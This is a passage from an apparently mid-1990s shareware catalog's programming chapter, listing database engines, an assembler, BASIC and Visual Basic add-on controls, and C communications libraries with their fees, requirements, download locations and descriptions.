full control over connections, right-angled or diagonal + connections; extensive customization with preferences. + + + 12.2 Database engines + + See also: Database applications. + + Product: Easy Base + RDBMS for PC or Network. See full description on page 222. + + Product: Keyed File System (DOS) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 2.12 (05-16-94) + Needs: IBM PC, DOS 3.3 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: KFSD212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSD.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 44k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the + Microsoft C (Version 6 and 7) programmer to write programs + using files with alphabetic or numeric keys. The package + provides common keyed file operations such as read by key, read + sequentially, read using partial key, add, replace, and delete. + + Chapter 12, "Computer programming" 386 + + + + Product: Keyed File System (OS/2) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 2.12 (04-11-94) + Needs: IBM 80386, OS/2 2.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 6); discounts on other products. + Look for: KFSO212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSO.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the OS/2 + programmer to create and use files having alphabetic or numeric + keyes. These routines are language independent and allow you to + write applications that create and use keyed files. Records in + these files may be read by full or partial key, read + sequentially, updated, and deleted. + + + Product: The MetaKit Library [***] + Author: Meta Four Software (Jean-Claude Wippler) + Version: 1.2 (05-28-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $25.00 + Registration benefits: Full program functionality; 12 months of + unlimited fax, CompuServe, mail support; 1-month return policy; + royalty-free runtime license; all ASP-wide offers (see page 6). + 12-month free upgrading allowed. Full source code available + for extra $65. + Look for: availability unknown on BBSs; M4KIT*.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 3 (or contact userID 72652,3262 for + assistance). + SWREG#: 10351 + PsL#: 14522 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Store/retrieve structured data. Features: on-demand loading, + failsafe commit & rollback, serialize for stream I/O, simple + API in a few C++ classes. Comes with hypertext intro, source + code examples including disk catalog and Winsock client/server, + and Winhelp API ref guide. No royalties. Link as DLL/LIB, + Win32/Win16/Dos libs included (MSVC). Includes full source code + for the widely used CatFish disk catalog browser. + + Chapter 12, "Computer programming" 387 + + + + Product: RexxBase + Author: American Coders, LTD. (Joseph R. McVerry), 919-846-2014 + Version: 2.00 (05-15-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $95.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 2 months of phone, + CompuServe, mail support; 1-month limited return policy; + royalty-free runtime license; bonus utilities; disks of other + shareware. 2-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: RXBAS136.ZIP on BBSs (call 703-385-4325 to download it + at no charge); RXBASE.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 74150,2370 for assistance). + SWREG#: 1953 + PsL#: 11174 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + An external Rexx function DLL. It allows Rexx procedures to + read/write/update dBase III and IV files. The program handles + both memo fields and indexes. Several other useful functions + are available to improve handling dBase files. + + With this release a front-end program is included to assist in + your database development needs. Create and maintain DBF, DBT, + NDX and MDX files. A simple report generator and data viewer is + included. + + + Product: Schooner + Graphical DOS software development system. See full + description on page 223. + + + 12.3 Languages + + See also: Utilities, System utilities, Batch & macro utilities, + Batch file compilers; Utilities, System utilities, + Configuration utilities; Database applications, Software tools + & add-ins. + + Chapter 12, "Computer programming" 388 + + + + 12.3.1 Assembler + + Product: A86 Macro Assembler + Author: Eric Isaacson Software, 812-339-1811 + Version: 3.22 (01-20-90) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $60.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; royalty-free runtime + license; bonus utilities; discounts on other products. + Lifetime free upgrading allowed. + Look for: A86V322.ZIP on BBSs (call 812-855-7252 to download it + at no charge); A86.ZIP on CompuServe in CIS:ZIPKEY forum + LIBrary 14 (or contact userID 71333,3154 for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1992 winner, Shareware Industry Awards. + 1986 winner, Public Brand Software contests for useful + programs. + Description: + The finest assembler available, at any price under any terms, + for the IBM PC & compatibles. It is more powerful, easier to + use, five times as fast, and ten times as compact as + Microsoft's MASM assembler. Assembles directly to a COM file, + or produces OBJ files that can be linked to high-level language + programs. + + + 12.3.2 BASIC + + Product: BASASM.LIB + Author: Annette Cuomo, 909-591-4956 + Version: 1.0 (06-22-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of support; bonus utilities. + Look for: availability unknown on BBSs; BASASM.ZIP on CompuServe + in ZNT:PROGRAMMIN forum LIBrary 4 (or contact userID 73747,3537 + for assistance). + Download size: 290k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Contains numerous low-level assembler language routines that + can be linked in with your BASIC programs. Provides file + handling, screen handling (including scrolling), DOS functions, + etc. + + + Product: Basic Training + BASIC language tutorial. See full description on page 410. + + Chapter 12, "Computer programming" 389 + + + + 12.3.2.1 Visual BASIC + + Product: AA-Array.DLL + Author: AA-Software International + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic v2.0 or + later. + Strongly recommended: Visual Basic v3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + discounts on upgrades. Bonus routines for user-defined types + arrays. + Look for: AA-ARRAY.ZIP on BBSs; AAARRY.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 4112 + PsL#: 11754 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Manages the creation, accessing, saving to and restoring from + disk of arrays with up to 4 Gigs elements and >64K of VB + strings. No VB imposed limits. Fast. Arrays can be Integer, + Long, Single, Double, Currency, or String. + + + Product: AAVBSORT.DLL + Author: AA-Software International + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic V2.0 or + better. + Strongly recommended: Visual Basic V3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + + Chapter 12, "Computer programming" 390 + + + + discounts on upgrades. Additional Sort Routines for User + Defined Types. + Look for: AAVBSORT.ZIP on BBSs; AASORT.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 3971 + PsL#: 11753 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Sorts VB arrays fast by providing a set of simple to use + routines. The routines, coded in C++, are much faster than a + sort done in Visual Basic. Two types of sort routines are + available: in-place and sort via index. Arrays can be: Integer, + Long, Single, Double, Currency, String, or Fixed String. In the + registered version arrays can be of User defined types. + + + Product: Alarm VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ALARM.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ALARM.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1475 + PsL#: 11091 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control fires an event at various times of the day (under + your control). You can specify times such as 9:12am, 10:45pm, + every hour on the hour, every ten minues, one per minute, etc. + + + Product: BarCod VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 391 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: BARCOD.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BARCOD.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1314 + PsL#: 11092 + Download size: 39k (about three minutes with a 2400 baud modem) + Description: + Displays bar codes for you. In supports Code 3 of 9, Code 2 of + 5, and more. Very simple. Place it on your form. Size it to + your liking. Set the bar code style. Then, just set the + Caption property. + + + Product: BmpLst VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.8 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $20.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: BMPLST.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BMPLST.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1059 + PsL#: 11093 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + This control is a list box with bitmaps. Each item in the list + can have both a bitmap and text. The bitmaps can be placed on + any side of the text (top, bottom, left, right). + + + Product: DFInfo VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 2.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 392 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: DFINFO.ZIP on BBSs (call 206-634-0783 to download it at + no charge); DFINFO.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1069 + PsL#: 11094 + Download size: 38k (about three minutes with a 2400 baud modem) + Description: + This custom control gives you disk and file information that + Visual Basic doesn't provide. It also allows you to change + some aspects of a file (attributes, size, date, time, etc.). + + + Product: FMDrop VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: FMDROP.ZIP on BBSs (call 206-634-0783 to download it at + no charge); FMDROP.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1378 + PsL#: 11095 + Download size: 28k (about two minutes with a 2400 baud modem) + Description: + This custom controls notifies you when a file has been dragged + and dropped from the Windows File Manager (FILEMGR). + + + Product: IniCon VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $5.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 393 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: INICON.ZIP on BBSs (call 206-634-0783 to download it at + no charge); INICON.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 833 + PsL#: 11096 + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + This control makes INI file access simple. WIN.INI and private + INI file access are both supported. No API calls required. + + + Product: JoyStk VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.2 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: JOYSTK.ZIP on BBSs (call 206-634-0783 to download it at + no charge); JOYSTK.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1340 + PsL#: 11097 + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Gives your program information and events about the joystick's + movement and buttons. One or two normal joysticks, one + 4-button joystick (such as a Gravis GamePad), or on 3-D + joystick are supported. + + + Product: MenuEv VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 394 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MENUEV.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MENUEV.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1270 + PsL#: 11098 + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Provides menu selection notification. In other words, it tells + you when the user has selected a menu item. This is really + useful for status bar style help. Really easy to use. All you + need to do is place it on your form. There's nothing to set. + Events start coming in automatically. The events give you the + text and tag of the menu item selected. + + + Product: MS Mega Pack (VBXes) + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $90.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MSMEGA.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSMEGA.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 2909 + PsL#: 11462 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + This package includes twelve of Mabry Software's most popular + controls: Alarm, BarCod, BmpLst, DFInfo, FMDrop, IniCon, + JoyStk, MenuEv, PerCnt, RoText, SoundX, and ZipInf. + + + Product: MSlot VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. Visual + Basic. + Registration fee: $30.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 395 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MSLOT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSLOT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1848 + Download size: 29k (about two minutes with a 2400 baud modem) + Description: + This custom control for Visual Basic makes mailslot use simple. + No Windows API calls required. + + + Product: Neural Network VBX + Author: ENSOFT (Joan Vilaseca Corbera), 34-77-862688 + Version: 1.1 (10-25-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; NNVBX.ZIP on CompuServe + in CIS:AIEXPERT forum LIBrary 11 (or contact userID 72333,615 + for assistance). + SWREG#: 5659 + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Multilayer Neural Network VBX with training by error + backpropagation for VB and Windows C/C++ compilers. Design, + train and use your own neural networks easily and with a + mininal code effort, just set/get properties. Trained nets can + also be saved to disk for later recall. + + + Product: PerCnt VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 2.5 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 396 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: PERCNT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PERCNT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 966 + PsL#: 11100 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Displays a percentage bar on your form. This makes status + reporting very easy. 3-D effects, fonts, and colors are all at + your control. + + + Product: Probe VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: PROBE.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PROBE.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11295 + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + This VBX lets you examine and modify other controls' properties + at run-time. After telling it the name of the other control, + it will give you a list of the properties of that control. Can + also display a dialog box that will let you modify other + controls' properties (at run-time). Its dialog box makes it + possible to fiddle with the properties of other controls at + run-time. Common dialog boxes are used for fonts and colors to + make selection easier. + + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 416. + + Chapter 12, "Computer programming" 397 + + + + Product: RoText VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ROTEXT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ROTEXT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11101 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + This control lets you place a label on your forms at any angle + or degree of rotation. This control can be bound to a data + control. + + + Product: RUF100.ZIP + Author: MIS Resources International (Wayne Edwards), + 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. Visual Basic + Professional 3.0 or higher. + Strongly recommended: XMS memory. + Registration fee: $50.00 (add $3.95 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, mail support; 3-month return policy; + royalty-free runtime license; site license; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: RUF100.ZIP on BBSs; RUF100.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 8 (or contact userID 75350,205 for + assistance). + SWREG#: 5262 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A collection of VB modules containing functions for database + access, ini files, help files, date/time validation, message + boxes, mapi, error messages, and other routines and forms. Each + form and function is documented in included help file. Fully + functional. + + Chapter 12, "Computer programming" 398 + + + + Product: SoundX VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: SOUNDX.ZIP on BBSs (call 206-634-0783 to download it at + no charge); SOUNDX.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1272 + PsL#: 11102 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control provides Soundex and Metaphone algorithms. Soundex + and Metaphone convert words or names to codes that represent + how they "sound". This can be really useful in a database + application where users need to find names they may not know + how to spell exactly. Use this control to make it easier for + them. Just put the word or name you want convert in, and the + appropriate codes come out. + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 41. + + Product: ZipInf VBX + Author: Mabry Software (James Shields), 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ZIPINF.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ZIPINF.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1595 + PsL#: 11103 + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + This control gives you information about the content + (directory) of a ZIP file. Many, many useful uses (File + Manager replacement, drive searching, etc.). + + Chapter 12, "Computer programming" 399 + + + + 12.3.3 C + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 417. + + Product: EMS4C Library + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (10-18-93) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EMS + memory; XMS memory. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, BBS, newsletter, + mail support; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 6). + Look for: EMS4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); EMSC10.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + EMS4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10912 + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Implements version 3.2 of the LIM (Lotus-Intel-Microsoft) + specification for expanded memory. It runs with version 3.2 and + 4.0 of the LIM specification. Included is the EMM4C library + which allows C programmers to allocate and free EMS memory + similiar to malloc() and free(). + + + Product: Keyed File System (DOS) + MS/C subroutines for keyed file support. See full description + on page 385. + + Product: Personal Comm Lib for Windows + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.2 (11-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. Microsoft C 7.0 or + Borland C 3.1 & 4.0. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + + Chapter 12, "Computer programming" 400 + + + + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PCL4W12.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLW12.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4W12.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11171 + Download size: 78k (about six minutes with a 2400 baud modem) + Description: + An asynchronous comm library for Windows developers. Supports + COM1 to COM4 from 300 to 115200 baud, 4 ports concurrently, all + memory models, DigiBoard PC/4 & PC/8, 16550 UART, interrupt + driven, RTS/CTS flow control. Includes simple windows terminal + program. + + + Product: Personal Comm Library for C/C++ + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 5.0 (11-20-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; bonus utilities; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: PCL4C50.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCLC50.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4C50.ZIP on GEnie in IBMPC forum LIBrary 4. + SWREG#: 287 + PsL#: 10908 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting COM1 to COM16 + from 300 to 115200 baud, 4 ports concurrently, all memory + models, DigiBoard PC/4 & PC/8, dumb BOCA boards, + 8250/16450/16550 UARTS, interrupt driven, RTS/CTS flow control. + Supports Borland C, Turbo C, Microsoft C, MIX Power C, and + Quick C. Includes a terminal program with ASCII, XMODEM, + YMODEM, and YMODEM-G. + + Chapter 12, "Computer programming" 401 + + + + Product: Personal Comm Library VB / Win + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (02-11-96) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. Visual + Basic for Windows. + Strongly recommended: Hayes-compatible modem. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; source code; all ASP-wide + offers (see page 6). + Look for: PCLVBW10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLVBW.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + Async comm library supporting COM1-COM20 to 115,200 baud, 4+ + ports concurrently, many dumb multiport boards, 16550 UART, + interrupt driven, RTS/CTS flow control, any UART address using + IRQ2 thru IRQ15. + + + Product: Personal Protocol Lib for C/C++ + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for C/C++ (PCL4C). + Strongly recommended: Hayes-compatible modem. + Registration fee: 